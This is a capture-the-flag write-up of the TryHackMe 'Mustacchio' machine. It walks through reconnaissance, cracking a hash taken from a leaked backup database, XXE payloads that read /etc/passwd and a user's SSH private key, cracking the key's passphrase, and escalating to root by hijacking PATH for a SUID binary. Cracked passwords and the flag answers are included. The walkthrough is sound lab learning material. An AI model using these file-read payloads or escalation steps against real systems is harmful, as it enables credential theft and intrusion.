TryHackMe - Mustacchio - Writeup

Easy boot2root Machine

Nmap Scan

root@ip-10-10-97-27:~# nmap -sCV -p- -T4

Starting Nmap 7.60 ( ) at 2021-06-12 09:53 BST
Nmap scan report for (
Host is up (0.00049s latency).
Not shown: 65532 filtered ports
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d3:9e:50:66:5f:27:a0:60:a7:e8:8b:cb:a9:2a:f0:19 (RSA)
|   256 5f:98:f4:5d:dc:a1:ee:01:3e:91:65:0a:80:52:de:ef (ECDSA)
|_  256 5e:17:6e:cd:44:35:a8:0b:46:18:cb:00:8d:49:b3:f6 (EdDSA)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
8765/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
MAC Address: 02:71:2C:CE:E8:AD (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 637.98 seconds

Directory Fuzzing

root@ip-10-10-97-27:~# dirb

DIRB v2.22    
By The Dark Raver

START_TIME: Sat Jun 12 09:16:44 2021
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt


GENERATED WORDS: 4612                                                          

---- Scanning URL: ----
==> DIRECTORY:                                                              
==> DIRECTORY:                                                               
==> DIRECTORY:                                                              
+ (CODE:200|SIZE:1752)                                                   
+ (CODE:200|SIZE:28)                                                     
+ (CODE:403|SIZE:277)   

In the folder there is a file called users.bak which is sqlite db.

root@ip-10-10-97-27:~# file users.bak
users.bak: SQLite 3.x database, last written using SQLite version 3034001

Open the sqlite db with sqlite browser there is a user name admin and md5 password. You can get the md5 password in file.

Go to and decrypt the password


Now in the machine there is SSH enabled try to login with admin:bulldog19 we failed to login via ssh but we know there is another port 8765 running as well login to the admin panel with admin:bulldog19 . We got access to admin panel.

In home.php source view you’ll get this, the document.cookie = “Example=/auth/dontforget.bak”; interesting.

<script type="text/javascript">
      //document.cookie = "Example=/auth/dontforget.bak"; 
      function checktarea() {
      let tbox = document.getElementById("box").value;
      if (tbox == null || tbox.length == 0) {
        alert("Insert XML Code!")

    <!-- Barry, you can now SSH in using your key!-->

Follow the path

<?xml version="1.0" encoding="UTF-8"?>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could\u2019ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could\u2019ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>

This XML viewer vulnerable to XXE. Use bellow payload to fetch the user in this machine. In the comment in the HTML source there is a hint about there is SSH key. We will try to fetch it.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxepay [
   <!ELEMENT xxepay ANY >
   <!ENTITY xxe SYSTEM  "file:///etc/passwd" >]>
  <author>Any Author</author>
  <com>Any comment</com>

This payload returned the the passwd file and the user of this machine is barry, I changed the path to /home/barry/.ssh/id_rsa to access SSH key.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxepay [
   <!ELEMENT xxepay ANY >
   <!ENTITY xxe SYSTEM  "file:///home/barry/.ssh/id_rsa" >]>
  <author>Any Author</author>
  <com>Any comment</com>

Here is the private key

Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,D137279D69A43E71BB7FCB87FC61D25E


This key encrypted we have to crack the password for this we are going to use ssh2john and john.

root@ip-10-10-97-27:~# python3 id_rsa > id_rsa.enc
root@ip-10-10-97-27:~# john id_rsa.enc --wordlist=/usr/share/wordlists/rockyou.txt
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
urieljames       (id_rsa)

The password is: urieljames

Now we can use the password to unlock SSH key. Logged in success

root@ip-10-10-97-27:~# ssh -i id_rsa barry@
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)

 * Documentation:
 * Management:
 * Support:

13 packages can be updated.
10 of these updates are security updates.
To see these additional updates run: apt list --upgradable

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

barry@mustacchio:~$ cat user.txt

What is the user flag?

  • Answer: 62d77a4d5f97d47c5aa38b3b2651b831

For privilege escalation first thing I try is sudo -l so I try this for this machine also but It didn’t worked. Moving on to check /etc/ /opt/ folders nothing in there.

In the hint I saw that it said SUID?

Let’s find SUID permission file

barry@mustacchio:~$ find / -perm /4000 2>/dev/null

The odd thing I notice is /home/joe/live_log executable. When you’ll run it you’ll get live log of admin panel. Use strings command to see if we can find any command which helping to see live log.

barry@mustacchio:~$ strings /home/joe/live_log
Live Nginx Log Reader
tail -f /var/log/nginx/access.log

tail -f /var/log/nginx/access.log tail is helping to disaply live log.

Now go to /tmp folder and create a file named with tail



change the permission

barry@mustacchio:/tmp$ chmod 777 tail
barry@mustacchio:/tmp$ export PATH=/tmp:$PATH
barry@mustacchio:/tmp$ which tail

Now add /tmp path to $PATH environment. Now run the /home/joe/live_log you’ll get root privilege.

root@mustacchio:/tmp# cat /root/root.txt

What is the root flag?

  • Answer: 3223581420d906c4dd1a5f9b530393a5

Thanks for reading

Room Link: Mustacchio

Written on June 12, 2021